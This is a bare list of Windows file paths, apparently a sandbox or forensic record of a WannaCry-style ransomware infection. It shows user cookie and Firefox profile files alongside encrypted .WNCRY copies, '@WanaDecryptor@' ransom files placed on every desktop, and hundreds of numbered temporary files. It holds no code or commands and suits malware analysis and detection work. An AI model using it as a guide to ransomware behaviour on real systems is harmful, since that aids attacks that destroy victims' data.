C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CAP0QFT4.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CAP0QFT4.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CJNGZV8R.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CJNGZV8R.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CJNGZV8R.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ERX8C8MI.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ERX8C8MI.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ERX8C8MI.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\F003S46Q.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\F003S46Q.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\F003S46Q.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\H6EPX8R1.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\H6EPX8R1.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\H6EPX8R1.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J29G05RA.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J29G05RA.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J29G05RA.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J52208RT.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J52208RT.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J52208RT.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIYBJCU5.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIYBJCU5.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIYBJCU5.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NFUEBPFN.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NFUEBPFN.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NFUEBPFN.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\U7UAY5KN.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\U7UAY5KN.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\U7UAY5KN.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UKC8F8RG.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UKC8F8RG.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UKC8F8RG.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VGVG2939.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VGVG2939.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VGVG2939.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WFG456IG.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WFG456IG.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WFG456IG.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X8F9LSJ0.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X8F9LSJ0.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X8F9LSJ0.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YM639DI1.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YM639DI1.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YM639DI1.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YX6BCVUK.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YX6BCVUK.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YX6BCVUK.txt.WNCRYT
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\AlternateServices.txt.WNCRY
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\AlternateServices.txt
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\AlternateServices.txt.WNCRYT
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\pkcs11.txt.WNCRY
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\pkcs11.txt
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\pkcs11.txt.WNCRYT
C:\ba69bdf0a250e352360c33\netfx_Full.mzz.WNCRY
C:\ba69bdf0a250e352360c33\netfx_Full.mzz
C:\ba69bdf0a250e352360c33\netfx_Full.mzz.WNCRYT
C:\Users\user\AppData\Local\Temp\0.WNCRYT
C:\Users\All Users\Desktop\@WanaDecryptor@.bmp
C:\Users\All Users\Desktop\@WanaDecryptor@.exe
C:\Users\Default\Desktop\@WanaDecryptor@.bmp
C:\Users\Default\Desktop\@WanaDecryptor@.exe
C:\Users\Default User\Desktop\@WanaDecryptor@.bmp
C:\Users\Default User\Desktop\@WanaDecryptor@.exe
C:\Users\Public\Desktop\@WanaDecryptor@.bmp
C:\Users\Public\Desktop\@WanaDecryptor@.exe
C:\Users\user\Desktop\@WanaDecryptor@.bmp
C:\Users\user\Desktop\@WanaDecryptor@.exe
C:\Users\user\AppData\Local\Temp\hibsys.WNCRYT
C:\
C:\Users\user\AppData\Local\Temp\1.WNCRYT
C:\Users\user\AppData\Local\Temp\2.WNCRYT
C:\Users\user\AppData\Local\Temp\3.WNCRYT
C:\Users\user\AppData\Local\Temp\4.WNCRYT
C:\Users\user\AppData\Local\Temp\5.WNCRYT
C:\Users\user\AppData\Local\Temp\6.WNCRYT
C:\Users\user\AppData\Local\Temp\7.WNCRYT
C:\Users\user\AppData\Local\Temp\8.WNCRYT
C:\Users\user\AppData\Local\Temp\9.WNCRYT
C:\Users\user\AppData\Local\Temp\10.WNCRYT
C:\Users\user\AppData\Local\Temp\11.WNCRYT
C:\Users\user\AppData\Local\Temp\12.WNCRYT
C:\Users\user\AppData\Local\Temp\13.WNCRYT
C:\Users\user\AppData\Local\Temp\14.WNCRYT
C:\Users\user\AppData\Local\Temp\15.WNCRYT
C:\Users\user\AppData\Local\Temp\16.WNCRYT
C:\Users\user\AppData\Local\Temp\17.WNCRYT
C:\Users\user\AppData\Local\Temp\18.WNCRYT
C:\Users\user\AppData\Local\Temp\19.WNCRYT
C:\Users\user\AppData\Local\Temp\20.WNCRYT
C:\Users\user\AppData\Local\Temp\21.WNCRYT
C:\Users\user\AppData\Local\Temp\22.WNCRYT
C:\Users\user\AppData\Local\Temp\23.WNCRYT
C:\Users\user\AppData\Local\Temp\24.WNCRYT
C:\Users\user\AppData\Local\Temp\25.WNCRYT
C:\Users\user\AppData\Local\Temp\26.WNCRYT
C:\Users\user\AppData\Local\Temp\27.WNCRYT
C:\Users\user\AppData\Local\Temp\28.WNCRYT
C:\Users\user\AppData\Local\Temp\29.WNCRYT
C:\Users\user\AppData\Local\Temp\30.WNCRYT
C:\Users\user\AppData\Local\Temp\31.WNCRYT
C:\Users\user\AppData\Local\Temp\32.WNCRYT
C:\Users\user\AppData\Local\Temp\33.WNCRYT
C:\Users\user\AppData\Local\Temp\34.WNCRYT
C:\Users\user\AppData\Local\Temp\35.WNCRYT
C:\Users\user\AppData\Local\Temp\36.WNCRYT
C:\Users\user\AppData\Local\Temp\37.WNCRYT
C:\Users\user\AppData\Local\Temp\38.WNCRYT
C:\Users\user\AppData\Local\Temp\39.WNCRYT
C:\Users\user\AppData\Local\Temp\40.WNCRYT
C:\Users\user\AppData\Local\Temp\41.WNCRYT
C:\Users\user\AppData\Local\Temp\42.WNCRYT
C:\Users\user\AppData\Local\Temp\43.WNCRYT
C:\Users\user\AppData\Local\Temp\44.WNCRYT
C:\Users\user\AppData\Local\Temp\45.WNCRYT
C:\Users\user\AppData\Local\Temp\46.WNCRYT
C:\Users\user\AppData\Local\Temp\47.WNCRYT
C:\Users\user\AppData\Local\Temp\48.WNCRYT
C:\Users\user\AppData\Local\Temp\49.WNCRYT
C:\Users\user\AppData\Local\Temp\50.WNCRYT
C:\Users\user\AppData\Local\Temp\51.WNCRYT
C:\Users\user\AppData\Local\Temp\52.WNCRYT
C:\Users\user\AppData\Local\Temp\53.WNCRYT
C:\Users\user\AppData\Local\Temp\54.WNCRYT
C:\Users\user\AppData\Local\Temp\55.WNCRYT
C:\Users\user\AppData\Local\Temp\56.WNCRYT
C:\Users\user\AppData\Local\Temp\57.WNCRYT
C:\Users\user\AppData\Local\Temp\58.WNCRYT
C:\Users\user\AppData\Local\Temp\59.WNCRYT
C:\Users\user\AppData\Local\Temp\60.WNCRYT
C:\Users\user\AppData\Local\Temp\61.WNCRYT
C:\Users\user\AppData\Local\Temp\62.WNCRYT
C:\Users\user\AppData\Local\Temp\63.WNCRYT
C:\Users\user\AppData\Local\Temp\64.WNCRYT
C:\Users\user\AppData\Local\Temp\65.WNCRYT
C:\Users\user\AppData\Local\Temp\66.WNCRYT
C:\Users\user\AppData\Local\Temp\67.WNCRYT
C:\Users\user\AppData\Local\Temp\68.WNCRYT
C:\Users\user\AppData\Local\Temp\69.WNCRYT
C:\Users\user\AppData\Local\Temp\70.WNCRYT
C:\Users\user\AppData\Local\Temp\71.WNCRYT
C:\Users\user\AppData\Local\Temp\72.WNCRYT
C:\Users\user\AppData\Local\Temp\73.WNCRYT
C:\Users\user\AppData\Local\Temp\74.WNCRYT
C:\Users\user\AppData\Local\Temp\75.WNCRYT
C:\Users\user\AppData\Local\Temp\76.WNCRYT
C:\Users\user\AppData\Local\Temp\77.WNCRYT
C:\Users\user\AppData\Local\Temp\78.WNCRYT
C:\Users\user\AppData\Local\Temp\79.WNCRYT
C:\Users\user\AppData\Local\Temp\80.WNCRYT
C:\Users\user\AppData\Local\Temp\81.WNCRYT
C:\Users\user\AppData\Local\Temp\82.WNCRYT
C:\Users\user\AppData\Local\Temp\83.WNCRYT
C:\Users\user\AppData\Local\Temp\84.WNCRYT
C:\Users\user\AppData\Local\Temp\85.WNCRYT
C:\Users\user\AppData\Local\Temp\86.WNCRYT
C:\Users\user\AppData\Local\Temp\87.WNCRYT
C:\Users\user\AppData\Local\Temp\88.WNCRYT
C:\Users\user\AppData\Local\Temp\89.WNCRYT
C:\Users\user\AppData\Local\Temp\90.WNCRYT
C:\Users\user\AppData\Local\Temp\91.WNCRYT
C:\Users\user\AppData\Local\Temp\92.WNCRYT
C:\Users\user\AppData\Local\Temp\93.WNCRYT
C:\Users\user\AppData\Local\Temp\94.WNCRYT
C:\Users\user\AppData\Local\Temp\95.WNCRYT
C:\Users\user\AppData\Local\Temp\96.WNCRYT
C:\Users\user\AppData\Local\Temp\97.WNCRYT
C:\Users\user\AppData\Local\Temp\98.WNCRYT
C:\Users\user\AppData\Local\Temp\99.WNCRYT
C:\Users\user\AppData\Local\Temp\100.WNCRYT
C:\Users\user\AppData\Local\Temp\101.WNCRYT
C:\Users\user\AppData\Local\Temp\102.WNCRYT
C:\Users\user\AppData\Local\Temp\103.WNCRYT
C:\Users\user\AppData\Local\Temp\104.WNCRYT
C:\Users\user\AppData\Local\Temp\105.WNCRYT
C:\Users\user\AppData\Local\Temp\106.WNCRYT
C:\Users\user\AppData\Local\Temp\107.WNCRYT
C:\Users\user\AppData\Local\Temp\108.WNCRYT
C:\Users\user\AppData\Local\Temp\109.WNCRYT
C:\Users\user\AppData\Local\Temp\110.WNCRYT
C:\Users\user\AppData\Local\Temp\111.WNCRYT
C:\Users\user\AppData\Local\Temp\112.WNCRYT
C:\Users\user\AppData\Local\Temp\113.WNCRYT
C:\Users\user\AppData\Local\Temp\114.WNCRYT
C:\Users\user\AppData\Local\Temp\115.WNCRYT
C:\Users\user\AppData\Local\Temp\116.WNCRYT
C:\Users\user\AppData\Local\Temp\117.WNCRYT
C:\Users\user\AppData\Local\Temp\118.WNCRYT
C:\Users\user\AppData\Local\Temp\119.WNCRYT
C:\Users\user\AppData\Local\Temp\120.WNCRYT
C:\Users\user\AppData\Local\Temp\121.WNCRYT
C:\Users\user\AppData\Local\Temp\122.WNCRYT
C:\Users\user\AppData\Local\Temp\123.WNCRYT
C:\Users\user\AppData\Local\Temp\124.WNCRYT
C:\Users\user\AppData\Local\Temp\125.WNCRYT
C:\Users\user\AppData\Local\Temp\126.WNCRYT
C:\Users\user\AppData\Local\Temp\127.WNCRYT
C:\Users\user\AppData\Local\Temp\128.WNCRYT
C:\Users\user\AppData\Local\Temp\129.WNCRYT
C:\Users\user\AppData\Local\Temp\130.WNCRYT
C:\Users\user\AppData\Local\Temp\131.WNCRYT
C:\Users\user\AppData\Local\Temp\132.WNCRYT
C:\Users\user\AppData\Local\Temp\133.WNCRYT
C:\Users\user\AppData\Local\Temp\134.WNCRYT
C:\Users\user\AppData\Local\Temp\135.WNCRYT
C:\Users\user\AppData\Local\Temp\136.WNCRYT
C:\Users\user\AppData\Local\Temp\137.WNCRYT
C:\Users\user\AppData\Local\Temp\138.WNCRYT
C:\Users\user\AppData\Local\Temp\139.WNCRYT
C:\Users\user\AppData\Local\Temp\140.WNCRYT
C:\Users\user\AppData\Local\Temp\141.WNCRYT
C:\Users\user\AppData\Local\Temp\142.WNCRYT
C:\Users\user\AppData\Local\Temp\143.WNCRYT
C:\Users\user\AppData\Local\Temp\144.WNCRYT
C:\Users\user\AppData\Local\Temp\145.WNCRYT
C:\Users\user\AppData\Local\Temp\146.WNCRYT
C:\Users\user\AppData\Local\Temp\147.WNCRYT
C:\Users\user\AppData\Local\Temp\148.WNCRYT
C:\Users\user\AppData\Local\Temp\149.WNCRYT
C:\Users\user\AppData\Local\Temp\150.WNCRYT
C:\Users\user\AppData\Local\Temp\151.WNCRYT
C:\Users\user\AppData\Local\Temp\152.WNCRYT
C:\Users\user\AppData\Local\Temp\153.WNCRYT
C:\Users\user\AppData\Local\Temp\154.WNCRYT
C:\Users\user\AppData\Local\Temp\155.WNCRYT
C:\Users\user\AppData\Local\Temp\156.WNCRYT
C:\Users\user\AppData\Local\Temp\157.WNCRYT
C:\Users\user\AppData\Local\Temp\158.WNCRYT
C:\Users\user\AppData\Local\Temp\159.WNCRYT
C:\Users\user\AppData\Local\Temp\160.WNCRYT
C:\Users\user\AppData\Local\Temp\161.WNCRYT
C:\Users\user\AppData\Local\Temp\162.WNCRYT
C:\Users\user\AppData\Local\Temp\163.WNCRYT
C:\Users\user\AppData\Local\Temp\164.WNCRYT
C:\Users\user\AppData\Local\Temp\165.WNCRYT
C:\Users\user\AppData\Local\Temp\166.WNCRYT
C:\Users\user\AppData\Local\Temp\167.WNCRYT
C:\Users\user\AppData\Local\Temp\168.WNCRYT
C:\Users\user\AppData\Local\Temp\169.WNCRYT
C:\Users\user\AppData\Local\Temp\170.WNCRYT
C:\Users\user\AppData\Local\Temp\171.WNCRYT
C:\Users\user\AppData\Local\Temp\172.WNCRYT
C:\Users\user\AppData\Local\Temp\173.WNCRYT
C:\Users\user\AppData\Local\Temp\174.WNCRYT
C:\Users\user\AppData\Local\Temp\175.WNCRYT
C:\Users\user\AppData\Local\Temp\176.WNCRYT
C:\Users\user\AppData\Local\Temp\177.WNCRYT
C:\Users\user\AppData\Local\Temp\178.WNCRYT
C:\Users\user\AppData\Local\Temp\179.WNCRYT
C:\Users\user\AppData\Local\Temp\180.WNCRYT
C:\Users\user\AppData\Local\Temp\181.WNCRYT
C:\Users\user\AppData\Local\Temp\182.WNCRYT
C:\Users\user\AppData\Local\Temp\183.WNCRYT
C:\Users\user\AppData\Local\Temp\184.WNCRYT
C:\Users\user\AppData\Local\Temp\185.WNCRYT
C:\Users\user\AppData\Local\Temp\186.WNCRYT
C:\Users\user\AppData\Local\Temp\187.WNCRYT
C:\Users\user\AppData\Local\Temp\188.WNCRYT
C:\Users\user\AppData\Local\Temp\189.WNCRYT
C:\Users\user\AppData\Local\Temp\190.WNCRYT
C:\Users\user\AppData\Local\Temp\191.WNCRYT
C:\Users\user\AppData\Local\Temp\192.WNCRYT
C:\Users\user\AppData\Local\Temp\193.WNCRYT
C:\Users\user\AppData\Local\Temp\194.WNCRYT
C:\Users\user\AppData\Local\Temp\195.WNCRYT
C:\Users\user\AppData\Local\Temp\196.WNCRYT
C:\Users\user\AppData\Local\Temp\197.WNCRYT
C:\Users\user\AppData\Local\Temp\198.WNCRYT
C:\Users\user\AppData\Local\Temp\199.WNCRYT
C:\Users\user\AppData\Local\Temp\200.WNCRYT
C:\Users\user\AppData\Local\Temp\201.WNCRYT
C:\Users\user\AppData\Local\Temp\202.WNCRYT
C:\Users\user\AppData\Local\Temp\203.WNCRYT
C:\Users\user\AppData\Local\Temp\204.WNCRYT
C:\Users\user\AppData\Local\Temp\205.WNCRYT
C:\Users\user\AppData\Local\Temp\206.WNCRYT
C:\Users\user\AppData\Local\Temp\207.WNCRYT
C:\Users\user\AppData\Local\Temp\208.WNCRYT
C:\Users\user\AppData\Local\Temp\209.WNCRYT
C:\Users\user\AppData\Local\Temp\210.WNCRYT
C:\Users\user\AppData\Local\Temp\211.WNCRYT
C:\Users\user\AppData\Local\Temp\212.WNCRYT
C:\Users\user\AppData\Local\Temp\213.WNCRYT
C:\Users\user\AppData\Local\Temp\214.WNCRYT
C:\Users\user\AppData\Local\Temp\215.WNCRYT
C:\Users\user\AppData\Local\Temp\216.WNCRYT
C:\Users\user\AppData\Local\Temp\217.WNCRYT
C:\Users\user\AppData\Local\Temp\218.WNCRYT
C:\Users\user\AppData\Local\Temp\219.WNCRYT
C:\Users\user\AppData\Local\Temp\220.WNCRYT
C:\Users\user\AppData\Local\Temp\221.WNCRYT
C:\Users\user\AppData\Local\Temp\222.WNCRYT
C:\Users\user\AppData\Local\Temp\223.WNCRYT
C:\Users\user\AppData\Local\Temp\224.WNCRYT
C:\Users\user\AppData\Local\Temp\225.WNCRYT
C:\Users\user\AppData\Local\Temp\226.WNCRYT
C:\Users\user\AppData\Local\Temp\227.WNCRYT
C:\Users\user\AppData\Local\Temp\228.WNCRYT
C:\Users\user\AppData\Local\Temp\229.WNCRYT
C:\Users\user\AppData\Local\Temp\230.WNCRYT
C:\Users\user\AppData\Local\Temp\231.WNCRYT
C:\Users\user\AppData\Local\Temp\232.WNCRYT
C:\Users\user\AppData\Local\Temp\233.WNCRYT
C:\Users\user\AppData\Local\Temp\234.WNCRYT
C:\Users\user\AppData\Local\Temp\235.WNCRYT
C:\Users\user\AppData\Local\Temp\236.WNCRYT
C:\Users\user\AppData\Local\Temp\237.WNCRYT
C:\Users\user\AppData\Local\Temp\238.WNCRYT
C:\Users\user\AppData\Local\Temp\239.WNCRYT
C:\Users\user\AppData\Local\Temp\240.WNCRYT
C:\Users\user\AppData\Local\Temp\241.WNCRYT
C:\Users\user\AppData\Local\Temp\242.WNCRYT
C:\Users\user\AppData\Local\Temp\243.WNCRYT
C:\Users\user\AppData\Local\Temp\244.WNCRYT
C:\Users\user\AppData\Local\Temp\245.WNCRYT
C:\Users\user\AppData\Local\Temp\246.WNCRYT
C:\Users\user\AppData\Local\Temp\247.WNCRYT
C:\Users\user\AppData\Local\Temp\248.WNCRYT
C:\Users\user\AppData\Local\Temp\249.WNCRYT
C:\Users\user\AppData\Local\Temp\250.WNCRYT
C:\Users\user\AppData\Local\Temp\251.WNCRYT
C:\Users\user\AppData\Local\Temp\252.WNCRYT
C:\Users\user\AppData\Local\Temp\253.WNCRYT
C:\Users\user\AppData\Local\Temp\254.WNCRYT
C:\Users\user\AppData\Local\Temp\255.WNCRYT
C:\Users\user\AppData\Local\Temp\256.WNCRYT
C:\Users\user\AppData\Local\Temp\257.WNCRYT
C:\Users\user\AppData\Local\Temp\258.WNCRYT
C:\Users\user\AppData\Local\Temp\259.WNCRYT
C:\Users\user\AppData\Local\Temp\260.WNCRYT
C:\Users\user\AppData\Local\Temp\261.WNCRYT
C:\Users\user\AppData\Local\Temp\262.WNCRYT
C:\Users\user\AppData\Local\Temp\263.WNCRYT
C:\Users\user\AppData\Local\Temp\264.WNCRYT
C:\Users\user\AppData\Local\Temp\265.WNCRYT
C:\Users\user\AppData\Local\Temp\266.WNCRYT
C:\Users\user\AppData\Local\Temp\267.WNCRYT
C:\Users\user\AppData\Local\Temp\268.WNCRYT
C:\Users\user\AppData\Local\Temp\269.WNCRYT
C:\Users\user\AppData\Local\Temp\270.WNCRYT
C:\Users\user\AppData\Local\Temp\271.WNCRYT
C:\Users\user\AppData\Local\Temp\272.WNCRYT
C:\Users\user\AppData\Local\Temp\273.WNCRYT
C:\Users\user\AppData\Local\Temp\274.WNCRYT
C:\Users\user\AppData\Local\Temp\275.WNCRYT
C:\Users\user\AppData\Local\Temp\276.WNCRYT
C:\Users\user\AppData\Local\Temp\277.WNCRYT
C:\Users\user\AppData\Local\Temp\278.WNCRYT
C:\Users\user\AppData\Local\Temp\279.WNCRYT
C:\Users\user\AppData\Local\Temp\280.WNCRYT
C:\Users\user\AppData\Local\Temp\281.WNCRYT
C:\Users\user\AppData\Local\Temp\282.WNCRYT
C:\Users\user\AppData\Local\Temp\283.WNCRYT
C:\Users\user\AppData\Local\Temp\284.WNCRYT
C:\Users\user\AppData\Local\Temp\285.WNCRYT
C:\Users\user\AppData\Local\Temp\286.WNCRYT
C:\Users\user\AppData\Local\Temp\287.WNCRYT
C:\Users\user\AppData\Local\Temp\288.WNCRYT
C:\Users\user\AppData\Local\Temp\289.WNCRYT
C:\Users\user\AppData\Local\Temp\290.WNCRYT
C:\Users\user\AppData\Local\Temp\291.WNCRYT
C:\Users\user\AppData\Local\Temp\292.WNCRYT
C:\Users\user\AppData\Local\Temp\293.WNCRYT
C:\Users\user\AppData\Local\Temp\294.WNCRYT
C:\Users\user\AppData\Local\Temp\295.WNCRYT
C:\Users\user\AppData\Local\Temp\296.WNCRYT
C:\Users\user\AppData\Local\Temp\297.WNCRYT
C:\Users\user\AppData\Local\Temp\298.WNCRYT
C:\Users\user\AppData\Local\Temp\299.WNCRYT
C:\Users\user\AppData\Local\Temp\300.WNCRYT
C:\Users\user\AppData\Local\Temp\301.WNCRYT
C:\Users\user\AppData\Local\Temp\302.WNCRYT
C:\Users\user\AppData\Local\Temp\303.WNCRYT
C:\Users\user\AppData\Local\Temp\304.WNCRYT
C:\Users\user\AppData\Local\Temp\305.WNCRYT
C:\Users\user\AppData\Local\Temp\306.WNCRYT
C:\Users\user\AppData\Local\Temp\307.WNCRYT
C:\Users\user\AppData\Local\Temp\308.WNCRYT
C:\Users\user\AppData\Local\Temp\309.WNCRYT
C:\Users\user\AppData\Local\Temp\310.WNCRYT
C:\Users\user\AppData\Local\Temp\311.WNCRYT
C:\Users\user\AppData\Local\Temp\312.WNCRYT
C:\Users\user\AppData\Local\Temp\313.WNCRYT
C:\Users\user\AppData\Local\Temp\314.WNCRYT
C:\Users\user\AppData\Local\Temp\315.WNCRYT
C:\Users\user\AppData\Local\Temp\316.WNCRYT
C:\Users\user\AppData\Local\Temp\317.WNCRYT
C:\Users\user\AppData\Local\Temp\318.WNCRYT
C:\Users\user\AppData\Local\Temp\319.WNCRYT
C:\Users\user\AppData\Local\Temp\320.WNCRYT
C:\Users\user\AppData\Local\Temp\321.WNCRYT
C:\Users\user\AppData\Local\Temp\322.WNCRYT
C:\Users\user\AppData\Local\Temp\323.WNCRYT
C:\Users\user\AppData\Local\Temp\324.WNCRYT
C:\Users\user\AppData\Local\Temp\325.WNCRYT
C:\Users\user\AppData\Local\Temp\326.WNCRYT
C:\Users\user\AppData\Local\Temp\327.WNCRYT
C:\Users\user\AppData\Local\Temp\328.WNCRYT
C:\Users\user\AppData\Local\Temp\329.WNCRYT
C:\Users\user\AppData\Local\Temp\330.WNCRYT
C:\Users\user\AppData\Local\Temp\331.WNCRYT
C:\Users\user\AppData\Local\Temp\332.WNCRYT
C:\Users\user\AppData\Local\Temp\333.WNCRYT
C:\Users\user\AppData\Local\Temp\334.WNCRYT
C:\Users\user\AppData\Local\Temp\335.WNCRYT
C:\Users\user\AppData\Local\Temp\336.WNCRYT
C:\Users\user\AppData\Local\Temp\337.WNCRYT
C:\Users\user\AppData\Local\Temp\338.WNCRYT
C:\Users\user\AppData\Local\Temp\339.WNCRYT
C:\Users\user\AppData\Local\Temp\340.WNCRYT
C:\Users\user\AppData\Local\Temp\341.WNCRYT
C:\Users\user\AppData\Local\Temp\342.WNCRYT
C:\Users\user\AppData\Local\Temp\343.WNCRYT
C:\Users\user\AppData\Local\Temp\344.WNCRYT
C:\Users\user\AppData\Local\Temp\345.WNCRYT
C:\Users\user\AppData\Local\Temp\346.WNCRYT
C:\Users\user\AppData\Local\Temp\347.WNCRYT
C:\Users\user\AppData\Local\Temp\348.WNCRYT
C:\Users\user\AppData\Local\Temp\349.WNCRYT
C:\Users\user\AppData\Local\Temp\350.WNCRYT
C:\Users\user\AppData\Local\Temp\351.WNCRYT
C:\Users\user\AppData\Local\Temp\352.WNCRYT
C:\Users\user\AppData\Local\Temp\353.WNCRYT
C:\Users\user\AppData\Local\Temp\354.WNCRYT
C:\Users\user\AppData\Local\Temp\355.WNCRYT
C:\Users\user\AppData\Local\Temp\356.WNCRYT
C:\Users\user\AppData\Local\Temp\357.WNCRYT
C:\Users\user\AppData\Local\Temp\358.WNCRYT
C:\Users\user\AppData\Local\Temp\359.WNCRYT
C:\Users\user\AppData\Local\Temp\360.WNCRYT
C:\Users\user\AppData\Local\Temp\361.WNCRYT
C:\Users\user\AppData\Local\Temp\362.WNCRYT
C:\Users\user\AppData\Local\Temp\363.WNCRYT
C:\Users\user\AppData\Local\Temp\364.WNCRYT
C:\Users\user\AppData\Local\Temp\365.WNCRYT
C:\Users\user\AppData\Local\Temp\366.WNCRYT
C:\Users\user\AppData\Local\Temp\367.WNCRYT
C:\Users\user\AppData\Local\Temp\368.WNCRYT
C:\Users\user\AppData\Local\Temp\369.WNCRYT
C:\Users\user\AppData\Local\Temp\370.WNCRYT
C:\Users\user\AppData\Local\Temp\371.WNCRYT
C:\Users\user\AppData\Local\Temp\372.WNCRYT
C:\Users\user\AppData\Local\Temp\373.WNCRYT
C:\Users\user\AppData\Local\Temp\374.WNCRYT
C:\Users\user\AppData\Local\Temp\375.WNCRYT
C:\Users\user\AppData\Local\Temp\376.WNCRYT
C:\Users\user\AppData\Local\Temp\377.WNCRYT
C:\Users\user\AppData\Local\Temp\378.WNCRYT
C:\Users\user\AppData\Local\Temp\379.WNCRYT
C:\Users\user\AppData\Local\Temp\380.WNCRYT
C:\Users\user\AppData\Local\Temp\381.WNCRYT
C:\Users\user\AppData\Local\Temp\382.WNCRYT
C:\Users\user\AppData\Local\Temp\383.WNCRYT
C:\Users\user\AppData\Local\Temp\384.WNCRYT
C:\Users\user\AppData\Local\Temp\385.WNCRYT
C:\Users\user\AppData\Local\Temp\386.WNCRYT
C:\Users\user\AppData\Local\Temp\387.WNCRYT
C:\Users\user\AppData\Local\Temp\388.WNCRYT
C:\Users\user\AppData\Local\Temp\389.WNCRYT
C:\Users\user\AppData\Local\Temp\390.WNCRYT
C:\Users\user\AppData\Local\Temp\391.WNCRYT
C:\Users\user\AppData\Local\Temp\392.WNCRYT
C:\Users\user\AppData\Local\Temp\393.WNCRYT
C:\Users\user\AppData\Local\Temp\394.WNCRYT
C:\Users\user\AppData\Local\Temp\395.WNCRYT
C:\Users\user\AppData\Local\Temp\396.WNCRYT
C:\Users\user\AppData\Local\Temp\397.WNCRYT
C:\Users\user\AppData\Local\Temp\398.WNCRYT
C:\Users\user\AppData\Local\Temp\399.WNCRYT
C:\Users\user\AppData\Local\Temp\400.WNCRYT
C:\Users\user\AppData\Local\Temp\401.WNCRYT
C:\Users\user\AppData\Local\Temp\402.WNCRYT
C:\Users\user\AppData\Local\Temp\403.WNCRYT
C:\Users\user\AppData\Local\Temp\404.WNCRYT
C:\Users\user\AppData\Local\Temp\405.WNCRYT
C:\Users\user\AppData\Local\Temp\406.WNCRYT
C:\Users\user\AppData\Local\Temp\407.WNCRYT
C:\Users\user\AppData\Local\Temp\408.WNCRYT
C:\Users\user\AppData\Local\Temp\409.WNCRYT
C:\Users\user\AppData\Local\Temp\410.WNCRYT
C:\Users\user\AppData\Local\Temp\411.WNCRYT
C:\Users\user\AppData\Local\Temp\412.WNCRYT
C:\Users\user\AppData\Local\Temp\413.WNCRYT
C:\Users\user\AppData\Local\Temp\414.WNCRYT
C:\Users\user\AppData\Local\Temp\415.WNCRYT
C:\Users\user\AppData\Local\Temp\416.WNCRYT
C:\Users\user\AppData\Local\Temp\417.WNCRYT
C:\Users\user\AppData\Local\Temp\418.WNCRYT
C:\Users\user\AppData\Local\Temp\419.WNCRYT
C:\Users\user\AppData\Local\Temp\420.WNCRYT
C:\Users\user\AppData\Local\Temp\421.WNCRYT
C:\Users\user\AppData\Local\Temp\422.WNCRYT
C:\Users\user\AppData\Local\Temp\423.WNCRYT
C:\Users\user\AppData\Local\Temp\424.WNCRYT
C:\Users\user\AppData\Local\Temp\425.WNCRYT
C:\Users\user\AppData\Local\Temp\426.WNCRYT
C:\Users\user\AppData\Local\Temp\427.WNCRYT
